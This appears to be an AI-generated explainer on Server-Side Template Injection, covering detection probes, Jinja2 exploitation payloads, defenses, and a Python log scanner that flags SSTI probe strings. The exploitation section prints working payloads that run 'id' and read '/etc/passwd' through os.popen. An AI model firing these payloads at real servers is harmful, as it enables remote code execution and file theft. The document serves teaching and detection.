AI Model:
nvidia/nemotron-3-nano-30b-a3b:free
{%if 1==1%}SSTIOK92088{%endif%}
Server‑Side Template Injection (SSTI)

Overview

Server‑Side Template Injection (SSTI) is a vulnerability where user‑controlled data is treated as template code and executed by the server‑side rendering engine hwkim301.com. This can lead to remote code execution, data leakage, or full server compromise.
Typical flow
- User input is reflected into a template engine without proper sanitization.
- The engine parses the payload as part of its syntax.
- If the engine evaluates the payload, attacker‑controlled code runs on the server.
Common engines affected include Jinja2, Twig, Freemarker, Velocity, ERB, and others mintlify.com.
Detection
- Fuzzing payloads – inject special patterns such as ${{<%[%'"}}% to see if the server treats them as template code red.infiltr8.io.
- Mathematical tests – {{7*7}} returning 49 indicates Jinja2 or Twig; {{7*'7'}} returning a long string confirms Jinja2 red.infiltr8.io.
- Engine identification – different engines use distinct syntax like ${7/0}, ${7*7}, <%= 7*7 %>; observing the response tells you which one is used book.hacktricks.wiki.
Exploitation
- Jinja2 RCE – a classic payload is {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}} which executes id on the server and returns its output hwkim301.com.
- File read – {{request.application.__globals__.__builtins__.__import__('os').popen('cat flag').read()}} can dump the flag file directly hwkim301.com.
- One‑liner for CTF – {{''.__class__.__bases__[0].__subclasses__()[1].__init__.__globals__['__import__']('os').popen('cat /etc/passwd').read()}} bypasses simple blacklists when the server does not sanitize __class__ access book.hacktricks.wiki.
Defense
- Input validation – always escape or whitelist user data before feeding it to a template engine.
- Use safe APIs – many frameworks provide auto‑escaping modes (e.g., Jinja2’s |e filter) that prevent code execution.
- Separate data from code – pass user input as variables rather than embedding it directly in the template string.
Images illustrating key concepts (sources: hacktricks.wiki, red.infiltr8.io, i.imgur.com).

A simple test payload such as {%if 1==1%}SSTIOK92088{%endif%} can be used to confirm whether conditional statements are evaluated by the template engine; if SSTIOK92088 appears in the response, the server is definitely interpreting Jinja‑style {% %} blocks, confirming SSTI hwkim301.com.
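The detection section above lists the probe strings (arithmetic in {{ }}, {% if %} blocks, <%= %>, ${ }) that an attacker sends to identify the engine; the same strings are what a defender should alert on. The following added example (not part of the original answer) scans constructed web-server access-log lines for those patterns in URL-decoded query parameters and labels each hit with the template family it suggests. The log lines, IPs and the /greet?name= endpoint are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not real traffic). The query strings carry the
# probe payloads from the detection section, percent-encoded as a browser would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /greet?name=alice HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /greet?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 503
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /greet?name=%7B%7B7*%277%27%7D%7D HTTP/1.1" 200 540
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /greet?name=%3C%25%3D+7*7+%25%3E HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /greet?name=%24%7B7*7%7D HTTP/1.1" 200 512
10.0.0.11 - - [01/Jan/2024:10:00:06 +0000] "GET /greet?name=%7B%25if+1%3D%3D1%25%7DSSTIOK92088%7B%25endif%25%7D HTTP/1.1" 200 523
10.0.0.11 - - [01/Jan/2024:10:00:07 +0000] "GET /greet?name=%7B%7B%27%27.__class__%7D%7D HTTP/1.1" 500 0
"""

# Ordered rules over the decoded parameter value; the first match wins, so the
# most specific signature (dunder attribute access inside {{ }}) comes first.
RULES = [
    (re.compile(r"\{\{[^}]*__\w+__[^}]*\}\}"), "python attribute traversal in {{ }}"),
    (re.compile(r"\{\{[^}]*\d+\s*\*\s*'?\d+'?[^}]*\}\}"), "jinja2/twig arithmetic probe"),
    (re.compile(r"\{%-?\s*if\b.*?%\}"), "jinja2/twig block statement"),
    (re.compile(r"<%=?.*?%>"), "erb/jsp-style expression"),
    (re.compile(r"\$\{[^}]*\}"), "freemarker/velocity-style expression"),
]
# Combined-log-format request line: client IP, request target and status code.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify_params(url: str) -> list:
    """Return (param, decoded_value, family) for every query parameter that matches a rule."""
    hits = []
    # parse_qsl percent-decodes values and turns '+' into spaces, so rules see the raw payload.
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for pattern, family in RULES:
            if pattern.search(value):
                hits.append((key, value, family))
                break
    return hits

def scan_log(text: str) -> list:
    """Scan access-log text and return one finding dict per suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not request records
        ip, url, status = m.groups()
        for key, value, family in classify_params(url):
            findings.append({"ip": ip, "param": key, "value": value,
                             "family": family, "status": int(status)})
    return findings
```

A 500 status paired with an attribute-traversal hit, as in the last sample line, is the combination worth escalating first, since it suggests the engine actually evaluated the expression.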